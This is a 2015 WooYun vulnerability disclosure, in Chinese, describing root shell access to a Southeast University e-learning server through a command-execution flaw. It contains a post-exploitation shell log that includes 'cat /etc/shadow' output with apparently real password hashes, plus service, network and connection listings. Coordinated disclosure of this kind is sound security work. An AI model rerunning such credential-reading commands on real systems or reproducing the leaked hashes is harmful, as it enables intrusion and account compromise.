东南大学某服务器getshell,众多站点系统沦陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160535

漏洞标题：东南大学某服务器getshell,众多站点系统沦陷

漏洞作者：朱元璋

提交时间：2015-12-17 09:12

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-17：细节已通知厂商并且等待厂商处理中
2015-12-17：厂商已经确认，细节仅向厂商公开
2015-12-27：细节向核心白帽子及相关领域专家公开
2016-01-06：细节向普通白帽子公开
2016-01-16：细节向实习白帽子公开
2016-01-28：细节向公众公开
简要描述：

详细说明：

google搜索词：site:**.**.**.**，得到一大堆系统
先看看部分受影响的站点系统
地址http://**.**.**.**/elearning2/home/login.action?course.uuid=3b8d6caa-a19e-11e2-97b7-ac162da4b60d存在命令执行漏洞
直接上传木马到服务器
漏洞证明：

[/usr/local/intellisoft/elearning2/elearning2/]$ whoami
root
/bin/sh: line 0: cd: /usr/local/intellisoft/elearning2/elearning2/: 没有那个文件或目录
[/usr/local/sh/]$ chkconfig --list
NetworkManager 	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
abrt-ccpp      	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
abrt-oops      	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
abrtd          	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
acpid          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
atd            	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
auditd         	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:关闭	6:关闭
autofs         	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
avahi-daemon   	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
bluetooth      	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:启用
certmonger     	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
cgconfig       	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
cgred          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
cman           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
corosync       	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
cpuspeed       	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:关闭
crond          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
cups           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
dnsmasq        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
firstboot      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
haldaemon      	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
ip6tables      	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
ipsec          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
iptables       	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
irqbalance     	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
iscsi          	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
iscsid         	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
kdump          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
libvirt-guests 	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
luci           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
lvm2-monitor   	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:关闭
matahari-broker	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
mcelogd        	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
mdmonitor      	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
messagebus     	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
modclusterd    	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
multipathd     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
netconsole     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
netfs          	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
network        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
nfs            	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
nfslock        	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
nginx          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
ntpd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
ntpdate        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
numad          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
oddjobd        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
openvpn        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
pcscd          	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
php-fpm        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
portreserve    	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
postfix        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
postgresql     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
psacct         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
qpidd          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
quota_nld      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rdisc          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
restorecond    	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rgmanager      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
ricci          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rngd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rpcbind        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
rpcgssd        	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
rpcidmapd      	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
rpcsvcgssd     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rsyslog        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
saslauthd      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
sblim-sfcb     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
smartd         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
snmpd          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
snmptrapd      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
spice-vdagentd 	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:启用	6:关闭
sshd           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
sssd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
svnserve       	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
tgtd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
tog-pegasus    	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
udev-post      	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:关闭
vsftpd         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
wdaemon        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
wpa_supplicant 	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
xinetd         	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
ypbind         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
基于 xinetd 的服务：
	amanda:        	关闭
	chargen-dgram: 	关闭
	chargen-stream:	关闭
	cvs:           	关闭
	daytime-dgram: 	关闭
	daytime-stream:	关闭
	discard-dgram: 	关闭
	discard-stream:	关闭
	echo-dgram:    	关闭
	echo-stream:   	关闭
	rsync:         	关闭
	tcpmux-server: 	关闭
	time-dgram:    	关闭
	time-stream:   	关闭
[/usr/local/sh/]$ cat /etc/shadow
root:$6$EGu1WH7o$YJ/8Ko6QcDpOeK.TNz5ur6c4yV.VFxDRKnUDjXxMgLoY/L02hl8dqjMEOOR09D0L1dnZULpGGS3SZNxIz1BjT1:16622:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:$6$zIHQmIBD$yIuNjPjvh8235nRWzsMPQV7MJqetj.Hox20UUtiafgJUJbz6C9s8GMskeb1QaSYplO4PuEJRyXRYh4/CkdDFg1:16573:0:99999:7:::
dbus:!!:15579::::::
rpc:!!:15579:0:99999:7:::
usbmuxd:!!:15579::::::
avahi-autoipd:!!:15579::::::
hsqldb:!!:15579::::::
oprofile:!!:15579::::::
vcsa:!!:15579::::::
rtkit:!!:15579::::::
abrt:!!:15579::::::
pegasus:!!:15579::::::
cimsrvr:!!:15579::::::
saslauth:!!:15579::::::
qpidd:!!:15579::::::
rpcuser:!!:15579::::::
nfsnobody:!!:15579::::::
ricci:!!:15579::::::
haldaemon:!!:15579::::::
postfix:!!:15579::::::
ntp:!!:15579::::::
amandabackup:!!:15579::::::
mysql:!!:15579::::::
apache:!!:15579::::::
avahi:!!:15579::::::
pulse:!!:15579::::::
gdm:!!:15579::::::
sshd:!!:15579::::::
postgres:!!:15579::::::
luci:!!:15579::::::
tcpdump:!!:15579::::::
zhouht:$6$vgtZos8z$1zGK/1RRarlwtc.zncprJeJnyQOhJqxl2V61Veie7Nt7oyFw3IsueS6IFM2uhkOgfdxL22Df6TXOFYqX9eM0y0:15580:0:99999:7:::
www:!!:15619:0:99999:7:::
clam:!!:16623::::::
[/usr/local/sh/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr AC:16:2D:A4:B6:0C  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::ae16:2dff:fea4:b60c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:333168135 errors:0 dropped:0 overruns:0 frame:0
          TX packets:549080442 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:109684300620 (102.1 GiB)  TX bytes:406437104452 (378.5 GiB)
          Interrupt:55 
eth1      Link encap:Ethernet  HWaddr AC:16:2D:A4:B6:0D  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:59 
eth2      Link encap:Ethernet  HWaddr AC:16:2D:A4:B6:0E  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:63 
eth3      Link encap:Ethernet  HWaddr AC:16:2D:A4:B6:0F  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:67 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:100054593 errors:0 dropped:0 overruns:0 frame:0
          TX packets:100054593 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:48004437399 (44.7 GiB)  TX bytes:48004437399 (44.7 GiB)
[/usr/local/sh/]$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver **.**.**.**
[/usr/local/sh/]$ bash prompt:
bash: prompt:: 没有那个文件或目录
[/usr/local/sh/]$ lsb_release -a
/bin/sh: lsb_release: command not found
[/usr/local/sh/]$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       Timer
tcp        0      0 **.**.**.**:9000              **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:33032               **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8009                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:3306                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:111                 **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8080                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:80                  **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:53586        **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8019                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:22                  **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:10007             **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:631               **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:4505                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:44042        **.**.**.**:1521         TIME_WAIT   timewait (33.54/0/0)
tcp        0      0 **.**.**.**:58795        **.**.**.**:3306         ESTABLISHED keepalive (6786.54/0/0)
tcp        0      0 **.**.**.**:44069        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44089        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45516        **.**.**.**:1433         ESTABLISHED keepalive (7187.34/0/0)
tcp        0      0 **.**.**.**:80           **.**.**.**:49841         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:37017             ESTABLISHED keepalive (1632.48/0/0)
tcp        0      0 **.**.**.**:59233             **.**.**.**:3306              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45461        **.**.**.**:1433         TIME_WAIT   timewait (43.58/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:54355             ESTABLISHED keepalive (2372.61/0/0)
tcp        0      0 **.**.**.**:45468        **.**.**.**:1433         TIME_WAIT   timewait (48.39/0/0)
tcp        0      0 **.**.**.**:58459        **.**.**.**:3306         ESTABLISHED keepalive (6416.55/0/0)
tcp        0      0 **.**.**.**:59279             **.**.**.**:3306              ESTABLISHED keepalive (6120.97/0/0)
tcp        0      0 **.**.**.**:42606        **.**.**.**:20000         ESTABLISHED keepalive (5585.17/0/0)
tcp        0      0 **.**.**.**:40194             **.**.**.**:38183             ESTABLISHED keepalive (2859.96/0/0)
tcp        0      0 **.**.**.**:45510        **.**.**.**:1433         ESTABLISHED keepalive (7182.52/0/0)
tcp        0      0 **.**.**.**:45512        **.**.**.**:1433         ESTABLISHED keepalive (7182.55/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:38386             ESTABLISHED keepalive (5341.65/0/0)
tcp        0      0 **.**.**.**:3306         **.**.**.**:36644         ESTABLISHED keepalive (5286.90/0/0)
tcp        0      0 **.**.**.**:59280             **.**.**.**:3306              ESTABLISHED keepalive (6120.98/0/0)
tcp        0      0 **.**.**.**:45513        **.**.**.**:1433         ESTABLISHED keepalive (7187.31/0/0)
tcp        0      0 **.**.**.**:59420             **.**.**.**:3306              ESTABLISHED keepalive (6355.96/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59278             ESTABLISHED keepalive (6120.96/0/0)
tcp        0      0 **.**.**.**:45469        **.**.**.**:1433         TIME_WAIT   timewait (48.39/0/0)
tcp        0      0 **.**.**.**:42506             **.**.**.**:53684             ESTABLISHED keepalive (1051.80/0/0)
tcp        0      0 **.**.**.**:44077        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:59276             **.**.**.**:3306              ESTABLISHED keepalive (6120.93/0/0)
tcp        0      0 **.**.**.**:44079        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59417             ESTABLISHED keepalive (6355.91/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59243             ESTABLISHED keepalive (6062.48/0/0)
tcp        0      0 **.**.**.**:45515        **.**.**.**:1433         ESTABLISHED keepalive (7187.33/0/0)
tcp        0      0 **.**.**.**:44095        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45509        **.**.**.**:1433         ESTABLISHED keepalive (7182.51/0/0)
tcp        0      0 **.**.**.**:44068        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:38387             ESTABLISHED keepalive (5341.65/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:41683             ESTABLISHED keepalive (2272.39/0/0)
tcp        0      0 **.**.**.**:58589        **.**.**.**:3306         ESTABLISHED keepalive (6636.78/0/0)
tcp        0      0 **.**.**.**:45508        **.**.**.**:1433         ESTABLISHED keepalive (7182.50/0/0)
tcp        0      0 **.**.**.**:44071        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:39547             ESTABLISHED keepalive (552.27/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:54354             ESTABLISHED keepalive (2456.46/0/0)
tcp        0      0 **.**.**.**:50000             **.**.**.**:34199             ESTABLISHED keepalive (5080.66/0/0)
tcp        0      0 **.**.**.**:58540        **.**.**.**:3306         ESTABLISHED keepalive (6546.54/0/0)
tcp        0      0 **.**.**.**:60981             **.**.**.**:51591             ESTABLISHED keepalive (740.99/0/0)
tcp        0      0 **.**.**.**:8080              **.**.**.**:50764             TIME_WAIT   timewait (9.55/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59245             ESTABLISHED keepalive (6062.50/0/0)
tcp        0      0 **.**.**.**:44080        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:80           **.**.**.**:13907        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44081        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59252             ESTABLISHED keepalive (6067.49/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59419             ESTABLISHED keepalive (6355.94/0/0)
tcp        0      0 **.**.**.**:59286             **.**.**.**:3306              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59254             ESTABLISHED keepalive (6067.52/0/0)
tcp        0      0 **.**.**.**:45466        **.**.**.**:1433         TIME_WAIT   timewait (48.38/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59253             ESTABLISHED keepalive (6067.50/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:37016             ESTABLISHED keepalive (1622.47/0/0)
tcp        0      0 **.**.**.**:58595        **.**.**.**:3306         ESTABLISHED keepalive (6642.04/0/0)
tcp        0      0 **.**.**.**:58569        **.**.**.**:3306         ESTABLISHED keepalive (6596.89/0/0)
tcp        0      0 **.**.**.**:44078        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45464        **.**.**.**:1433         TIME_WAIT   timewait (43.58/0/0)
tcp        0      0 **.**.**.**:59287             **.**.**.**:3306              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:59419             **.**.**.**:3306              ESTABLISHED keepalive (6355.94/0/0)
tcp        0      0 **.**.**.**:58615        **.**.**.**:3306         ESTABLISHED keepalive (6678.16/0/0)
tcp        0      0 **.**.**.**:58554        **.**.**.**:3306         ESTABLISHED keepalive (6580.90/0/0)
tcp        0      0 **.**.**.**:44038        **.**.**.**:1521         TIME_WAIT   timewait (28.53/0/0)
tcp        0      0 **.**.**.**:58659        **.**.**.**:3306         ESTABLISHED keepalive (6756.77/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59233             ESTABLISHED keepalive (6045.93/0/0)
tcp        0      0 **.**.**.**:45460        **.**.**.**:1433         TIME_WAIT   timewait (43.57/0/0)
tcp        0      0 **.**.**.**:58602        **.**.**.**:3306         ESTABLISHED keepalive (6669.13/0/0)
tcp        0      0 **.**.**.**:53684             **.**.**.**:42506             ESTABLISHED keepalive (1051.79/0/0)
tcp        0      0 **.**.**.**:58634        **.**.**.**:3306         ESTABLISHED keepalive (6726.77/0/0)
tcp        0      0 **.**.**.**:44041        **.**.**.**:1521         TIME_WAIT   timewait (28.56/0/0)
tcp        0      0 **.**.**.**:58528        **.**.**.**:3306         ESTABLISHED keepalive (6524.63/0/0)
tcp        0      0 **.**.**.**:58603        **.**.**.**:3306         ESTABLISHED keepalive (6670.90/0/0)
tcp        0      0 **.**.**.**:58466        **.**.**.**:3306         ESTABLISHED keepalive (6431.54/0/0)
tcp        0      0 **.**.**.**:44088        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44037        **.**.**.**:1521         TIME_WAIT   timewait (28.52/0/0)
tcp        0      0 **.**.**.**:59288             **.**.**.**:3306              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:45517        **.**.**.**:1433         ESTABLISHED keepalive (7187.34/0/0)
tcp        0      0 **.**.**.**:44045        **.**.**.**:1521         TIME_WAIT   timewait (33.56/0/0)
tcp        0      0 **.**.**.**:58616        **.**.**.**:3306         ESTABLISHED keepalive (6696.22/0/0)
tcp        0      0 **.**.**.**:8080              **.**.**.**:50789             ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59277             ESTABLISHED keepalive (6120.93/0/0)
tcp        0      0 **.**.**.**:44044        **.**.**.**:1521         TIME_WAIT   timewait (33.55/0/0)
tcp        0      0 **.**.**.**:58543        **.**.**.**:3306         ESTABLISHED keepalive (6551.72/0/0)
tcp        0      0 **.**.**.**:59278             **.**.**.**:3306              ESTABLISHED keepalive (6120.94/0/0)
tcp        0      0 **.**.**.**:3306         **.**.**.**:46393         ESTABLISHED keepalive (5513.13/0/0)
tcp        0      0 **.**.**.**:50789             **.**.**.**:8080              ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44067        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44043        **.**.**.**:1521         TIME_WAIT   timewait (33.53/0/0)
tcp        0      0 **.**.**.**:58893        **.**.**.**:3306         ESTABLISHED keepalive (6861.76/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:41681             ESTABLISHED keepalive (2272.37/0/0)
tcp        0      0 **.**.**.**:38183             **.**.**.**:40194             ESTABLISHED keepalive (2859.95/0/0)
tcp        0      0 **.**.**.**:34199             **.**.**.**:50000             ESTABLISHED keepalive (5080.65/0/0)
tcp        0      0 **.**.**.**:8080              **.**.**.**:50765             TIME_WAIT   timewait (10.37/0/0)
tcp        0      0 **.**.**.**:44066        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58882        **.**.**.**:3306         ESTABLISHED keepalive (6851.44/0/0)
tcp        0      0 **.**.**.**:58702        **.**.**.**:3306         ESTABLISHED keepalive (6768.46/0/0)
tcp        0      0 **.**.**.**:58661        **.**.**.**:3306         ESTABLISHED keepalive (6760.89/0/0)
tcp        0      0 **.**.**.**:44072        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58520        **.**.**.**:3306         ESTABLISHED keepalive (6515.58/0/0)
tcp        0      0 **.**.**.**:58565        **.**.**.**:3306         ESTABLISHED keepalive (6587.85/0/0)
tcp        0      0 **.**.**.**:45514        **.**.**.**:1433         ESTABLISHED keepalive (7187.30/0/0)
tcp        0      0 **.**.**.**:59417             **.**.**.**:3306              ESTABLISHED keepalive (6355.90/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59251             ESTABLISHED keepalive (6067.47/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59276             ESTABLISHED keepalive (6120.91/0/0)
tcp        0      0 **.**.**.**:44094        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:51591             **.**.**.**:60981             ESTABLISHED keepalive (740.98/0/0)
tcp        0      0 **.**.**.**:58529        **.**.**.**:3306         ESTABLISHED keepalive (6533.65/0/0)
tcp        0      0 **.**.**.**:59418             **.**.**.**:3306              ESTABLISHED keepalive (6355.91/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59280             ESTABLISHED keepalive (6120.96/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59255             ESTABLISHED keepalive (6067.52/0/0)
tcp        0      0 **.**.**.**:45511        **.**.**.**:1433         ESTABLISHED keepalive (7182.52/0/0)
tcp        0      0 **.**.**.**:58895        **.**.**.**:3306         ESTABLISHED keepalive (6872.29/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59420             ESTABLISHED keepalive (6355.94/0/0)
tcp        0      0 **.**.**.**:44086        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44087        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44091        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58601        **.**.**.**:3306         ESTABLISHED keepalive (6666.75/0/0)
tcp        0      0 **.**.**.**:58737        **.**.**.**:3306         ESTABLISHED keepalive (6771.75/0/0)
tcp        0      0 **.**.**.**:44064        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59287             ESTABLISHED keepalive (6135.93/0/0)
tcp        0      0 **.**.**.**:58518        **.**.**.**:3306         ESTABLISHED keepalive (6506.53/0/0)
tcp        0      0 **.**.**.**:58904        **.**.**.**:3306         ESTABLISHED keepalive (6881.33/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:39548             ESTABLISHED keepalive (572.25/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59421             ESTABLISHED keepalive (6355.95/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59279             ESTABLISHED keepalive (6120.94/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:37019             ESTABLISHED keepalive (1632.45/0/0)
tcp        0      0 **.**.**.**:58881        **.**.**.**:3306         ESTABLISHED keepalive (6831.70/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:59286             ESTABLISHED keepalive (6135.91/0/0)
tcp        0      0 **.**.**.**:59421             **.**.**.**:3306              ESTABLISHED keepalive (6355.95/0/0)
tcp        0      0 **.**.**.**:80           **.**.**.**:64000        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:58527        **.**.**.**:3306         ESTABLISHED keepalive (6521.51/0/0)
tcp        0      0 **.**.**.**:44033        **.**.**.**:1521         TIME_WAIT   timewait (8.54/0/0)
tcp        0      0 **.**.**.**:3306              **.**.**.**:56130             ESTABLISHED keepalive (6024.80/0/0)
tcp        0      0 **.**.**.**:44085        **.**.**.**:1521         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:44030        **.**.**.**:1521         TIME_WAIT   timewait (8.51/0/0)
tcp        0      0 **.**.**.**:44031        **.**.**.**:1521         TIME_WAIT   timewait (8.52/0/0)
tcp        0      0 **.**.**.**:58552        **.**.**.**:3306         ESTABLISHED keepalive (6560.73/0/0)
tcp        0      0 **.**.**.**:43782        **.**.**.**:20000         ESTABLISHED keepalive (740.82/0/0)
tcp        0      0 **.**.**.**:58577        **.**.**.**:3306         ESTABLISHED keepalive (6623.96/0/0)
